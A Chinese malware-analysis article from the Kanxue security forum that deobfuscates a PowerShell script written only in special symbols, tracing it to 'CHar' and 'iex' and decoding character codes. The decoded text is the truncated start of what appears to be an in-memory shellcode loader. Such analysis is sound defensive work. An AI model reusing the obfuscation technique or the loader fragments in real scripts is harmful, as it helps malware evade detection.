其他
如何阅读只包含特殊符号的powershell脚本
本文为看雪论坛优秀文章
看雪论坛作者ID:LarryS
一
基础变量
1、数字
('[%' |% { ${[[[[[[[} = + $() }{ ${[[[[[[[[}=${[[[[[[[}} {${[[[[[[[[[[[}= ++ ${[[[[[[[} }{${[[[} = ++${[[[[[[[} } {${[[[[[[} = ++ ${[[[[[[[} }{${[[} =++${[[[[[[[}} { ${[[[[[[[[[[[[} =++ ${[[[[[[[} }{${[[[[[[[[[[}= ++ ${[[[[[[[} }{${[[[[[[[[[}=++${[[[[[[[} } {${[[[[} = ++ ${[[[[[[[}} {${[} = ++ ${[[[[[[[} } {${[[[[[} = "["+"$( @{ })"[ ${[[[[[[[[[}] +"$(@{ })"[ "${[[[[[[[[[[[}" +"${[}" ]+"$( @{ } ) "["${[[[}"+"${[[[[[[[[}"]+ "$? "[ ${[[[[[[[[[[[} ]+ "]" }{${[[[[[[[} = "".("$(@{} ) "["${[[[[[[[[[[[}${[[}"] +"$(@{})"["${[[[[[[[[[[[}${[[[[[[[[[[}"]+"$(@{} ) "[ ${[[[[[[[[} ] +"$(@{ } )"[ ${[[}] +"$?"[ ${[[[[[[[[[[[} ] + "$(@{ } ) "[ ${[[[[[[} ] ) } {${[[[[[[[} ="$( @{})"["${[[[[[[[[[[[}${[[}"] +"$( @{ } ) "[${[[} ]+"${[[[[[[[}"[ "${[[[}${[[[[[[[[[}"] } ) ;
{ ${[[[[[[[} = + $() }
{ ${[[[[[[[[} = ${[[[[[[[} } # 0
{ ${[[[[[[[[[[[} = ++ ${[[[[[[[} } # 1
{ ${[[[} = ++${[[[[[[[} } # 2
{ ${[[[[[[} = ++ ${[[[[[[[} } # 3
{ ${[[} = ++${[[[[[[[} } # 4
{ ${[[[[[[[[[[[[} = ++ ${[[[[[[[} } # 5
{ ${[[[[[[[[[[} = ++ ${[[[[[[[} } # 6
{ ${[[[[[[[[[} = ++${[[[[[[[} } # 7
{ ${[[[[} = ++ ${[[[[[[[} } # 8
{ ${[} = ++ ${[[[[[[[} } # 9
{ ${[[[[[} = "["+"$( @{ })"[ ${[[[[[[[[[}] +"$(@{ })"[ "${[[[[[[[[[[[}" +"${[}" ]+"$( @{ } ) "["${[[[}"+"${[[[[[[[[}"]+ "$? "[ ${[[[[[[[[[[[} ]+ "]" }
{ ${[[[[[[[} = "".("$(@{} ) "["${[[[[[[[[[[[}${[[}"] +"$(@{})"["${[[[[[[[[[[[}${[[[[[[[[[[}"]+"$(@{} ) "[ ${[[[[[[[[} ] +"$(@{ } )"[ ${[[}] +"$?"[ ${[[[[[[[[[[[} ] + "$(@{ } ) "[ ${[[[[[[} ] ) }
{ ${[[[[[[[} = "$( @{})"["${[[[[[[[[[[[}${[[}"] +"$( @{ } ) "[${[[} ]+"${[[[[[[[}"[ "${[[[}${[[[[[[[[[}"] }
{ ${[[[[[} = "["+"$( @{ })"[ 7] +"$(@{ })"[ "1" +"9" ]+"$( @{ } ) "["2"+"0"]+ "$? "[ 1 ]+ "]" }
{ ${[[[[[[[} = "".("$(@{} ) "["14"] +"$(@{})"["16"]+"$(@{} ) "[ 0 ] +"$(@{ } )"[ 4] +"$?"[ 1 ] + "$(@{ } ) "[ 3 ] ) }
{ ${[[[[[[[} = "$( @{})"["14"] +"$( @{ } ) "[4 ]+"${[[[[[[[}"[ "27"] }
2、“CHar”
00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
S y s t e m . C o l l e c t i o n s . H a s h t a b l e
3、 “iex”
string Insert(int startIndex, string value)
<Object>.Method name
00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42
s t r i n g I n s e r t ( i n t s t a r t I n d e x , s t r i n g v a l u e )
二
脚本处理
{ ${[[[[[[[[} = 0 }
{ ${[[[[[[[[[[[} = 1 }
{ ${[[[} = 2 }
{ ${[[[[[[} = 3 }
{ ${[[} = 4 }
{ ${[[[[[[[[[[[[} = 5 }
{ ${[[[[[[[[[[} = 6 }
{ ${[[[[[[[[[} = 7 }
{ ${[[[[} = 8 }
{ ${[} = 9 }
{ ${[[[[[} = "CHar" }
{ ${[[[[[[[} = "iex" }
"iex([Char]83+[Char]101 +[Char]116+[Char]45 + [Char]83+[Char]116 + [Char]114+[Char]105+ [Char]99 +[Char]116+ [Char]77+[Char]111+ [Char]100 + [Char]101 + [Char]32+[Char]45 +[Char]86 + [Char]101+[Char]114 +[Char]115 +[Char]105 + [Char]111+[Char]110+ [Char]32+[Char]50 +[Char]10 +[Char]10 + [Char]102+[Char]117+[Char]110+ [Char]99+[Char]116+[Char]105 +[Char]111 + [Char]110 +[Char]32 +[Char]102 + [Char]117 + [Char]110 + [Char]99+ [Char]95 + [Char]103 +[Char]101+ [Char]116+[Char]95+[Char]112 +[Char]114+[Char]111+ [Char]99 + [Char]95+ [Char]97 + [Char]100+[Char]100+[Char]114+[Char]101 +[Char]115 + [Char]115+ [Char]32 +[Char]123 +[Char]10 +[Char]9 +[Char]80 + [Char]97 +[Char]114 + [Char]97+[Char]109 +[Char]32+[Char]40+[Char]36 +[Char]118 +[Char]97 +[Char]114+[Char]95 +[Char]109 +[Char]111+ [Char]100 + [Char]117 +[Char]108 +[Char]101 + [Char]44+[Char]32+ [Char]36 +[Char]118+ [Char]97+[Char]114+[Char]95+[Char]112 +[Char]114+[Char]111 +[Char]99+ [Char]101+ [Char]100 + [Char]117 +[Char]114+ [Char]101 +[Char]41 +[Char]9+ [Char]9+ [Char]10+ [Char]9 + [Char]36+[Char]118 +[Char]97 +[Char]114 +[Char]95 + [Char]117+[Char]110+ [Char]115 + [Char]97 +[Char]102+[Char]101+ [Char]95 +[Char]110 + [Char]97 +[Char]116+[Char]105 + [Char]118 + [Char]101+ [Char]95+[Char]109+ [Char]101 + [Char]116+ [Char]104 +[Char]111+ [Char]100 +[Char]115+ [Char]32 + [Char]61 +[Char]32 +[Char]40 + [Char]91 + [Char]65 +[Char]112+[Char]112 +[Char]68+ [Char]111+ [Char]109+ [Char]97 + [Char]105+[Char]110 +[Char]93 +[Char]58 +[Char]58 +[Char]67+[Char]117 + [Char]114+ [Char]114 + [Char]101 +[Char]110 + [Char]116 +[Char]68+[Char]111 +[Char]109 + [Char]97 + [Char]105 + [Char]110+[Char]46 +[Char]71 + [Char]101+[Char]116 + [Char]65+......
83 101 116 45 83 116 114 105 99 116 77 111 100 101 32 45 86 101 114 115 105 111 110 32 50 10 10 102 117 110 99 116 105 111 110 32 102 117 110 99 95 103 101 116 95 112 114 111 99 95 97 100 100 114 101 115 115 32 123 10 9 80 97 114 97 109 32 40 36 118 97 114 95 109 111 100 117 108 101 44 32 36 118 97 114 95 112 114 111 99 101 100 117 114 101 41 9 9 10 9 36 118 97 114 95 117 110 115 97 102 101 95 110 97 116 105 118 101 95 109 101 116 104 111 100 115 32 61 32 40 91 65 112 112 68 111 109 97 105 110 93 58 58 67 117 114 114 101 110 116 68 111 109 97 105 110 46 71 101 116 65 115 115 101 109 98 108 105 101 115 40 41 32 124 32 87 104 101 114 101 45 79 98 106 101 99 116 32 123 32 36 95 46 71 108 111 98 97 108 65 115 115 101 109 98 108 121 67 97 99 104 101 32 45 65 110 100 32 36 95 46 76 111 99 97 116 105 111 110 46 83 112 108 105 116 40 39 92 92 39 41 91 45 49 93 46 69 113 117 97 108 115 40 39 83 121 115 116 101 109 46 100 108 108 39 41 32 125 41 46 71 101 116 84 121 112 101 40 39 77 105 99 114 111 11......
三
额外处理
看雪ID:LarryS
https://bbs.pediy.com/user-home-600394.htm
# 往期推荐
1.栈与栈帧的调试
2.python_mmdt:ssdeep、tlsh、vhash、mmdthash对比
5.Windows本地代码执行漏洞(CVE-2012-1876)x86/x64平台分析
球分享
球点赞
球在看
点击“阅读原文”,了解更多!